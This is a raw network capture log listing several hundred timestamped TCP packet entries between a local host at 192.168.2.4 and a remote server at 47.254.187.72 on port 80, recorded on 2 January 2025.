                                                                            Jan 2, 2025 20:34:52.835585117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.835589886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.835618973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.835649014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840394974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840431929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840481997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840495110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840506077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840516090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840524912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840536118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840547085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840564966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840570927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840574026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840584993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840600967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840605021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840610981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840620041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840627909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840631962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840641975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840651989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840657949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840662956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840675116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.840687990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840706110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.840729952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.842320919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842330933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842360973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842371941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842382908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842387915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.842395067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842413902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.842434883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842447996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.842458963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.842473030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.842498064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.843421936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843431950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843447924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843460083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843471050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843476057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.843516111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.843545914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843558073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843569994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843580961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.843589067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.843609095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.843636036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913043022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913067102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913085938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913095951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913106918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913117886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913129091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913131952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913140059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913151026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913161039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913177967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913193941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913203955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913208008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913213968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913230896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913239956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913240910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913252115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913256884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913265944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913276911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913286924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913288116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913297892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913320065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913324118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913337946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913340092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913352013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913362980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913362980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913382053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913410902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913429022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913439989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913450003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913460016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913470984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913474083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913501024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913511992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913532972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913548946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913561106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913570881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913580894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913587093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913616896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913672924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913683891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913695097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913705111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913712978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913716078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913727045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913732052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913763046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913867950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913883924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913894892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913904905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913914919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913919926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913933039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913940907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913944006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913954020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913960934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913964987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913975000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913985968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.913988113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.913995981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914016008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914026976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914028883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914037943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914047003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914055109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914082050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914129972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914141893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914176941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914264917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914275885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914285898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914298058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914308071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914309025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914319038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914329052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.914340019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914357901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.914387941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.917212963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917229891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917242050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917252064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917263985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917274952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917292118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.917299986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.917324066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.917356968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.919533014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919543028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919553041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919564962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919574022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919583082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919591904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.919595003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919605017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919615984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.919616938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919625998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.919647932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.919668913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.922441006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922451973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922461987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922472000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922482967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922492981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922504902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.922507048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.922533035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.922569036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927146912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927159071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927174091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927185059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927195072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927205086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927208900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927222013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927236080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927236080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927278996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927360058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927370071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927386045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927397013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927406073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927409887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927417040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927423000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927428961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927442074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927454948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927459002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.927483082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.927505016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.929183006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929222107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.929241896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929253101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929269075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929280043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929280996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.929291010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929301023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929311991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929316998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.929321051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.929337978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.929358959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.930203915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930249929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.930272102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930282116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930291891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930304050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930310965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.930320024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930330992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930340052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.930341959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:52.930356979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:52.930387020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000324011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000349045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000368118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000377893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000389099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000396013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000406981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000418901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000423908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000431061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000469923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000523090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000533104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000544071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000552893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000554085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000566006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000576019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000586033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000586987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000597000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000610113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000616074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000632048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000633955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000648975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000659943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000663996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000669956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000680923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000684023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000689983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000700951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000713110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000722885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000731945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000740051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000742912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000752926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000763893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000775099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000775099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000785112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000793934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000802994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000811100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000813961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000824928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000838995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000864983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000921965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000933886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000945091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000957012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000965118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000967979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000978947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.000979900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.000997066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001008987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001014948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001019955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001030922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001048088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001049042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001059055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001064062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001072884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001082897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001091957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001094103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001115084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001127005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001127005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001137972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001144886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001157045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001168013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001169920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001178980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001188993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001199007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001204014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001214027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001214981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001228094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001238108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001240015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001245022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001255035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001266956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001271009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001277924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001286983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001288891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.001312017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.001338005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.004026890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004040003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.004057884 CET804973047.254.187.72192.168.2.4
